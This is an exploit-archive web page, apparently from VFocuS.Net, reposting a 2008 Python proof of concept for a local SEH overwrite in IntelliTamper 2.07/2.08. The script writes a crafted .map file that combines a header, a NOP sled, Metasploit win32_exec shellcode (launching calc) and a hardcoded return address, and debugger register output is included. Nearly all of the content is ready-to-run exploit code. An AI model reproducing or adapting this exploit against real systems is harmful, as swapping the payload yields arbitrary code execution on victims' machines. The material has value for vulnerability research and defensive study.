首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 IntelliTamper 2.07/2.08 (MAP File) Local SEH Overwrite Exploit 来源：cN4phux@gmail.com 作者：cN4phux 发布时间：2008-12-29   #!/usr/bin/python # IntelliTamper 2.07/2.08  (MAP File) 0-day Local SEH Overwrite Exploit # Bug discovered by cN4phux <cN4phux@gmail.com> # Tested on: IntelliTamper 2.07/2.08 / win32 SP3 FR # Shellcode: Windows Execute Command (calc) <metasploit.com> # Here's the debugger output like what u see, the EIP overwritten & attempt to read from address 41414141 so the prog must be crashz . . # EAX 0015B488 ECX 00123400 EDX 00123610 # EBX 00000000 ESP 00123604 EBP 00128B78 # ESI 00000000 EDI 00123A64 EIP 41414141 #Vive les Algeriens & greatz to friend's : me (XD) Heurs, Djug , Blub , His0k4 , Knuthy , Moorish , Ilyes , #Here's the the Poc : import sys map_theader = ((("\x23\x23\x23\x20\x53\x49\x54\x45\x4D"                  "\x41\x50\x31\x20\x49\x4E\x54\x45\x4C"                  "\x4C\x49\x54\x41\x4D\x50\x45\x52\x0D\x0A"))) #junk map_iheader = "\x46\x49\x4C\x45\x23\x23" # win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com shellcode = ((("\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc5"                "\x91\xc1\x60\x83\xeb\xfc\xe2\xf4\x39\x79\x85\x60\xc5\x91\x4a\x25"                "\xf9\x1a\xbd\x65\xbd\x90\x2e\xeb\x8a\x89\x4a\x3f\xe5\x90\x2a\x29"                "\x4e\xa5\x4a\x61\x2b\xa0\x01\xf9\x69\x15\x01\x14\xc2\x50\x0b\x6d"                "\xc4\x53\x2a\x94\xfe\xc5\xe5\x64\xb0\x74\x4a\x3f\xe1\x90\x2a\x06"                "\x4e\x9d\x8a\xeb\x9a\x8d\xc0\x8b\x4e\x8d\x4a\x61\x2e\x18\x9d\x44"                "\xc1\x52\xf0\xa0\xa1\x1a\x81\x50\x40\x51\xb9\x6c\x4e\xd1\xcd\xeb"                "\xb5\x8d\x6c\xeb\xad\x99\x2a\x69\x4e\x11\x71\x60\xc5\x91\x4a\x08"                "\xf9\xce\xf0\x96\xa5\xc7\x48\x98\x46\x51\xba\x30\xad\x61\x4b\x64"                "\x9a\xf9\x59\x9e\x4f\x9f\x96\x9f\x22\xf2\xa0\x0c\xa6\x91\xc1\x60"))); # 160 byte header_nop = "\x90"*327 retn = "\x7b\x34\x12\x00"+".html\n" # EIP value with 4 byte fix exploit = map_theader + map_iheader + header_nop + shellcode + retn headers = open("0x.map", "w") headers.write(exploit) headers.close() print "\nFile created successfully !"; print "\n\cN4phux.";   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Microsoft Internet Explorer XM ·Firefox, Internet Explorer, Op ·Amaya Web Browser <= 11.0.1 Re ·Exploits joomla com_lowcosthot ·MS Windows Media Player * (.WA ·PSI remote integer overflow Do ·Joomla Component com_liveticke ·FreeBSD 7/6x protosw kernel ex ·Joomla Component com_ice 0.5b2 ·SAWStudio 3.9i (prf File) Loca ·BulletProof FTP Client (.bps F ·Acoustica Mixcraft <= 4.2 Univ   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved